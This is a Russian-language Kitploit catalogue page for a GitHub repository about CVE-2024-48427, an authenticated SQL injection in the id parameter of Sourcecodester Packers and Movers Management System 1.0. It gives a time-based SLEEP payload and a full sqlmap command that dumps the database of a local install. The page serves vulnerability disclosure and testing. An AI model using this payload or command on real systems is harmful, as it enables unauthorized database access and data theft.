Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-48427 | Kitploit
Инструменты/GitHubGitHub/vighneshnair7/cve-2024-48427
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеБезопасность Баз Данных
GitHubvighneshnair7/cve-2024-48427

CVE-2024-48427

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-48427

Описание

Уязвимость SQL-инъекции в Sourcecodester Packers and Movers Management System v1.0 позволяет удалённым аутентифицированным пользователям выполнять произвольные SQL-команды через параметр id в /mpms/admin/?page=services/manage_service&id

Тип уязвимости

SQL-инъекция

Производитель продукта

Sourcecodester

Затронутая кодовая база продукта:

https://www.sourcecodester.com/php/15360/packers-and-movers-management-system-phpoop-free-source-code.html - 1.0

Затронутый компонент:

Параметр id в разделе Update Service Details по адресу /mpms/admin/?page=services/manage_service&id

Векторы атаки:

  1. Установите приложение локально и войдите в панель администратора, используя предоставленные учётные данные по умолчанию.
  2. Перейдите на уязвимую страницу: http://localhost/mpms/admin/?page=services/manage_service&id=2
  3. Внедрите SQL-пейлоад в параметр id: http://localhost/mpms/admin/?page=services/manage_service&id=1' OR SLEEP(5)-- puNr
  4. Наблюдайте за ответом приложения: если инъекция успешна, страница должна загружаться заметно дольше (на 5 секунд), что подтверждает уязвимость параметра id к SQL-инъекции.
  5. Теперь запустите SQLMap для извлечения данных из базы данных:
  6. sqlmap -u "http://localhost/mpms/admin/?page=services/manage_service&id=1" --cookie="phpMyAdmin=ju34bd3d8q0jdf6td4ntqscaqd;PHPSESSID=eopn8q1p8c1f5m1v5igjoir8k1;" --dbms mysql -p id --risk 3 --level 4 --dbs --dump

Ссылки:

  1. https://owasp.org/www-community/attacks/SQL_Injection
  2. https://portswigger.net/web-security/sql-injection
Скачать инструмент